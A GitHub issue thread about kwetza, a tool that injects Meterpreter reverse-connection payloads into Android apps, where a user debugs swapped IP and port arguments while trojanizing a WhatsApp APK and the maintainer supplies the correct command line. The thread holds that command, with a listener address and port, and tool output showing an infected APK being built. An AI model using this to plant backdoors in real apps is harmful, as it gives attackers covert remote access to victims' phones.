### ISSUE TITLE
Endpoint IP and PORT.

### ISSUE THREAD

**Issue by Esbjornsson** [sensepost/kwetza#22]
So, after typing "python kwetza.py APK.apk 192.168.XXX.XXX 4444 yes", which I assume is the correct way to type it, I get the PORT as the endpoint IP and yes as the endport PORT. I haven't got around to actually try if it still works, but it's rather annoying. Bug or what?

DECOMPILING TARGET APK
[+] ENDPOINT IP: 4444 <----- Should be my IP
[+] ENDPOINT PORT: yes <----- Should be my PORT
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[+] TARGET ACTIVIY: com.whatsapp.Main
[*] PREPARING PAYLOADS
[*] INJECTING INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!
[+] TIME TO BUILD INFECTED APK...
[*] EXECUTING APKTOOL BUILD COMMAND...
[+] BUILD RESULT

**Comment by Esbjornsson** [comment]
EDIT: The app doesn't connect to the Meterpreter when opened. Have tried this with 2 different apps.

**Comment by Esbjornsson** [comment]
EDIT 2: I figured it out!

So I the Don Does 30 video about this and he doesn't input TCP/HTTP before the IP. I scrolled down in the "code" section and saw that I was supposed to type in the TCP option!

**Comment by brompwnie** [comment]
Hi there,
An example with correct usage would be "python kwetza.py hackme.apk https 10.42.0.118 4444 yes". This usage is specified in the Readme.
